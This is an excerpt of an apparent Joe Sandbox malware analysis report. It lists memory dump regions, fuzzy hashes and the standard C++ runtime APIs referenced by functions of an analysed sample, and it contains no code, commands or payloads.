                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7224e10e0f5057d5ecffe88508de54a6e7bede1dbb6ddec7f5f7d4b4d6bb3b9a
                                    • Instruction ID: 7fb20c397beb4cb39cfd8b1c7c6abcc6e56b63eabe2a22c73d76ceebaf0761c7
                                    • Opcode Fuzzy Hash: 7224e10e0f5057d5ecffe88508de54a6e7bede1dbb6ddec7f5f7d4b4d6bb3b9a
                                    • Instruction Fuzzy Hash: 4CC1DC70900646CEDB27CF28C984F7ABBB9AB05302F19060FDC569B6B1C731A94CCB61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2e2660e0f182a6e3a809521e4dbfbbf69b72aecf260c47a7542baabff9492a9d
                                    • Instruction ID: 273b924aaba555cbe313a17a53e6fab7144ad5678a153c755650483728a058c4
                                    • Opcode Fuzzy Hash: 2e2660e0f182a6e3a809521e4dbfbbf69b72aecf260c47a7542baabff9492a9d
                                    • Instruction Fuzzy Hash: 937124B1E10156CFDB168F69C8907BFBBB5EB1A300F4482A8D85997783C334991AC7A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 55936177c0cadf8e64807edef39b1c1cc04f8487d53122d72d552d84443274e0
                                    • Instruction ID: 6cf8f84fa7d388b4cab6cce63ce85fd1a702dd7cb4c5c8c3da1edb927f282b30
                                    • Opcode Fuzzy Hash: 55936177c0cadf8e64807edef39b1c1cc04f8487d53122d72d552d84443274e0
                                    • Instruction Fuzzy Hash: 9861A3316302658FD749CF6EECD0536B355E38A31178942ABEA82CB395C635E936C7E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 91e4ac4dedcaeb8a5061242e32770af3a7ff9466b844038cb6691bbd591f7922
                                    • Instruction ID: dcd8db24d9187a5c2bc5a8922c8c323052c2041b461e556f02eb572628f776b4
                                    • Opcode Fuzzy Hash: 91e4ac4dedcaeb8a5061242e32770af3a7ff9466b844038cb6691bbd591f7922
                                    • Instruction Fuzzy Hash: C851B375D1120A9FCB04EF68C841BEEBBB4FF48714F108259E815B7390D770AE548BA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
                                    • Instruction ID: 751ac7a02601a5668a77d2ab512413d34f180c2427f7b693c919058537463b3d
                                    • Opcode Fuzzy Hash: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
                                    • Instruction Fuzzy Hash: BB51B072D00219EFDF15CF98C840AEEFBB6FF88305F5A8059E914AB251D734AA45CB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 9dc7ee35bf668246bc6c74dd410fc3076fd972b0826d19ec81c07dd2f6d658c7
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 6111087B24114143D65E863DD8F4EBBA7A5EACD323B2E427ADC824B774D123B94D9D00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 406d510390014fefd1a82c20581410ebb3d72bbedb9bfe5da394d14f634be72f
                                    • Instruction ID: 5c05e549f2a3765b0e8837543321cc35fd6e434991aa706e06b4bfa9d745b3de
                                    • Opcode Fuzzy Hash: 406d510390014fefd1a82c20581410ebb3d72bbedb9bfe5da394d14f634be72f
                                    • Instruction Fuzzy Hash: 20F014FA30C5257FB906E1862B209FB676EE6C6B30332D42EF40FC6156E6945E4E6031
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAEB3
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAED5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DAEF5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DAF1F
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAF8D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002DAFD9
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002DAFF3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DB088
                                    • std::_Facet_Register.LIBCPMT ref: 002DB095
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 61ab7fc679b365d35d154aae093ef1961e0b4681806bb741df9f3c4fbe8ac0db
                                    • Instruction ID: a9102804d1ac02778f9c1eefa2933936d83d31b936d119d17c345d4b3324d86c
                                    • Opcode Fuzzy Hash: 61ab7fc679b365d35d154aae093ef1961e0b4681806bb741df9f3c4fbe8ac0db
                                    • Instruction Fuzzy Hash: 0F618DB1D102459FDF22DFA4D885B9EBBF8AF05310F184459E854AB381E735ED09CBA2
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002737E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00273835
                                    • __Getctype.LIBCPMT ref: 0027384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0027386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002738FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: 0:'$bad locale name
                                    • API String ID: 1840309910-3347340704
                                    • Opcode ID: 2ffac5ceb068537d5c83f325c249e8d81343556a055656285c6c21eb3c547eeb
                                    • Instruction ID: 0d6a20771bc0b04027ff2963b9e1be7f0ac5b714152168e72f8163ac54081fe1
                                    • Opcode Fuzzy Hash: 2ffac5ceb068537d5c83f325c249e8d81343556a055656285c6c21eb3c547eeb
                                    • Instruction Fuzzy Hash: 775186F1D102499BDF11DFE4D885B9EFBB8AF14314F148169EC08AB241E775EA18CB52
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 003508B7
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 003508BF
                                    • _ValidateLocalCookies.LIBCMT ref: 00350948
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00350973
                                    • _ValidateLocalCookies.LIBCMT ref: 003509C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: C4$csm
                                    • API String ID: 1170836740-4180369814
                                    • Opcode ID: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
                                    • Instruction ID: 28aa4dd28d1d516810046d8b25ffecd6fdafe1c9c029068fe8531d0c3f482be3
                                    • Opcode Fuzzy Hash: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
                                    • Instruction Fuzzy Hash: D041C634A00209ABDF16DF68C880E9EBBB5FF45325F148055EC199B376D732DA49CB91
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002D9543
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002D9566
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002D9586
                                    • std::_Facet_Register.LIBCPMT ref: 002D95FB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002D9613
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002D962B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 8589eb1f166fbd5cbd44c740deb305c6bef8ca2df99142bd48f1e951d359b25b
                                    • Instruction ID: 57f2a1d16a195b27a9e98866145e966c731ff71e974066e48f41ab7c1a68c5de
                                    • Opcode Fuzzy Hash: 8589eb1f166fbd5cbd44c740deb305c6bef8ca2df99142bd48f1e951d359b25b
                                    • Instruction Fuzzy Hash: 4641CF71D1021A9FCF12DF58E841BAABBB8FB05310F14462AE9196B391D730EE55CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002760F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0027617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00276248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 002761CC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: 362d142aaca5a4de723435d0f86152d8ee96099df1a0e880235f1e5a0a4814c8
                                    • Instruction ID: 46d72fadea726c4fe7728e4b8e07356f8504bccd397aad5c29164011309326ef
                                    • Opcode Fuzzy Hash: 362d142aaca5a4de723435d0f86152d8ee96099df1a0e880235f1e5a0a4814c8
                                    • Instruction Fuzzy Hash: 75E113B09106049FCB29DF68C845B9EF7F9FF45300F10861DE45A97B81D7B4AA58CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002786DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002786ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
